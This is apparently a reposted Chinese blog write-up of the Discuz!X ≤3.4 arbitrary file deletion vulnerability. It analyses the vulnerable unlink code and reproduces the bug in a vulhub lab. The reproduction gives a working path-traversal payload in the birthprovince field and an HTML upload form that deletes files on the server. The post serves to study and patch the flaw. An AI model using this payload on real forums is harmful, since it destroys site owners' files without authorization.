2. 程式人生 > 實用技巧 >Discuz!X ≤3.4 任意檔案刪除漏洞

Discuz!X ≤3.4 任意檔案刪除漏洞

阿新 發佈:2020-10-28

Discuz!X ≤3.4 任意檔案刪除漏洞

簡述

漏洞原因:之前存在的任意檔案刪除漏洞修復不完全導致可以繞過。

漏洞修復時間:2017年9月29日官方對gitee上的程式碼進行了修復

漏洞原理分析

home.php中存在,get引數不滿足條件時進入

require_once libfile('home/'.$mod, 'module');

libfile(功能:構造檔案路徑)

function libfile($libname, $folder = '') {
    $libpath = '/source/'.$folder;
    if(strstr($libname, '/')) {
        list($pre, $name) = explode('/', $libname);
        $path = "{$libpath}/{$pre}/{$pre}_{$name}";
    } else {
        $path = "{$libpath}/{$libname}";
    }
    return preg_match('/^[\w\d\/_]+$/i', $path) ? realpath(DISCUZ_ROOT.$path.'.php') : false;
}

利用中的請求的Get請求:mod=spacecp&ac=profile&op=base

經過處理返回到home_spacecp.php在此檔案中最後一行,引入檔案spacecp_profile.php

問題所在檔案:spacecp_profile.php

upload/source/include/spacecp/spacecp_profile.php

進入程式碼70行

if(submitcheck('profilesubmit')) {

提交profilesubmit進入判斷

第185行開始對檔案上傳進行處理,下接第205行

			if(!$upload->error()) {
				$upload->save();

				if(!$upload->get_image_info($attach['target'])) {
					@unlink($attach['target']);
					continue;
				}
				$setarr[$key] = '';
				$attach['attachment'] = dhtmlspecialchars(trim($attach['attachment']));
				if($vid && $verifyconfig['available'] && isset($verifyconfig['field'][$key])) {
					if(isset($verifyinfo['field'][$key])) {
            @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
						$verifyarr[$key] = $attach['attachment'];
					}
					continue;
				}
				if(isset($setarr[$key]) && $_G['cache']['profilesetting'][$key]['needverify']) {
          @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
					$verifyarr[$key] = $attach['attachment'];
					continue;
        }
        @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
				$setarr[$key] = $attach['attachment'];
			}

檔案上傳成功,!$upload->error()進入unlink語句

@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);

回溯變數$space[$key](使用者的個人設定)

$space = getuserbyuid($_G['uid']);
space_merge($space, 'field_home');
space_merge($space, 'profile');

從資料庫查詢使用者相關的資訊儲存到變數$space中。birthprovince就是其中之一。

因為birthprovince可控,所以利用這一變數,在設定頁面提交即可繞過欄位內容的限制

此時$space[key] = $space[birthprovince] = '../../../robots.txt'

漏洞復現

啟動環境

用的vulhub-master進行復現

啟動docker

sudo systemctl start docker

執行環境

cd /vulhub-master/discuz/x3.4-arbitrary-file-deletion
docker-compose up -d

復現

docker exec [容器] ls檢視目錄下檔案

註冊並且登入後進入個人資料 檢視原始碼找到formhash(第二個)

請求

home.php?mod=spacecp&ac=profile&op=base

POST:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=b7a54465
其中formhash為使用者hash

修改成功後出生地會變為../../../robots.txt

新建一個upload.html,構造請求向home.php?mod=spacecp&ac=profile&op=base上傳檔案

<body>
    <form action="http://ip/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

重新整理頁面發現出生地變成了圖片地址

請求後docker exec [容器] ls發現目標檔案(robots.txt)已經被刪除了

漏洞修復

直接刪除幾條unlink語句

相關推薦

Discuz!X ≤3.4 任意檔案刪除漏洞

Discuz!X ≤3.4 任意檔案刪除漏洞 簡述 漏洞原因:之前存在的任意檔案刪除漏洞修復不完全導致可以繞過。

Discuz!X ≤3.4 任意檔案刪除漏洞分析

作者:LoRexxar\'@知道創宇404實驗室 發表時間:2017年9月30日 0x01 簡述 Discuz!X社群軟體,是一個採用 PHP 和 MySQL 等其他多種資料庫構建的效能優異、功能全面、安全穩定的社群論壇平臺。

Wordpress <= 4.9.6 任意檔案刪除漏洞

Wordpress <= 4.9.6 任意檔案刪除漏洞 前言 從 3.7.0 版本開始, WordPress 在使用者登入時,會在後臺對小版本的改變進行更新,這樣不利於我們分析程式碼。我們可以通過將 AUTOMATIC_UPDATER_DISABLED 設定成 t

Discuz! 任意檔案刪除漏洞重現及分析

0x00 概述 9月29日,Discuz修復了一個前臺任意檔案刪除漏洞,相似的漏洞曾在2014年被提交給wooyun和discuz官方,但是修復不完全導致了這次的漏洞

CVE-2020-3452 CISCO ASA遠端任意檔案讀取漏洞

0x01 漏洞描述 Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

Tomcat任意檔案寫入漏洞

Tomcat任意檔案寫入漏洞 參考連結:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

通達OA11.6任意檔案刪除+檔案上傳組合GetShell

通達OA11.6任意檔案刪除+檔案上傳組合GetShell 漏洞介紹 通達OA(Office Anywhere網路智慧辦公系統)是由北京通達信科科技有限公司自主研發的協同辦公自動化軟體,是與中國企業管理實踐相結合形成的綜合管理辦公平臺

mysql任意檔案讀取漏洞復現

前言 第一次得知該漏洞後找了一些文章去看。 一開始不明白這個漏洞是怎麼來的,只知道通過在服務端執行poc指令碼就可以讀取客戶端的任意檔案,直接找到網上準備好的靶機進行測試,發現可行,然後就拿別人的poc試驗,

泛微雲橋e-Bridge-任意檔案讀取漏洞

1.資產查詢 Fofa: title="泛微雲橋 e-Bridge" 2.漏洞描述 泛微雲橋e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。

漏洞復現:ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)

一、漏洞描述 該漏洞出現在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許使用者通過HTTP PUT方法上傳檔案到指定目錄。Fileserver支援寫入檔案(不解析jsp),但是支援移動檔案(Move)我們可以將jsp的檔案PU

Apache Ambari 公佈任意檔案下載漏洞

新春現金紅包與免費Linux基金會培訓&認證,等你來領!>>> 近日,Apache 官方公告了一個Apache Ambari 的任意檔案下載漏洞。Ambari的鑑權模組存在設計缺陷,惡意使用者可以繞過身份驗證,通過構

phpcms 9.6.1任意檔案下載漏洞分析

環境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影響版本: PHPCMS 9.6.1

若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

0x00若依介紹 若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。寓意

漏洞復現-CVE-2017-12615-tomcat PUT方法任意檔案寫入漏洞

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 版本:Tomcat 7.x版本內conf/web.xml配置檔案內預設配置無readonly引數,需要手工新增,預設配置條件下不受此漏洞影響。

漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

0x00 漏洞詳情 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTPInputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺

Apache Druid LoadData 任意檔案讀取漏洞-CVE-2021-36749

漏洞原理: 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP InputSource 來繞過應用程式級別的限制。由於 Apache Druid 預設情況下是缺乏授權認證,攻擊者可利用該漏洞在未授權情況

Grafana 未授權任意檔案讀取漏洞

漏洞原理:   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗

Grafana 任意檔案讀取漏洞 (CVE-2021-43798)學習

漏洞概述 Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。

Grafana 任意檔案讀取漏洞(CVE-2021-43798)

Preface   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗證的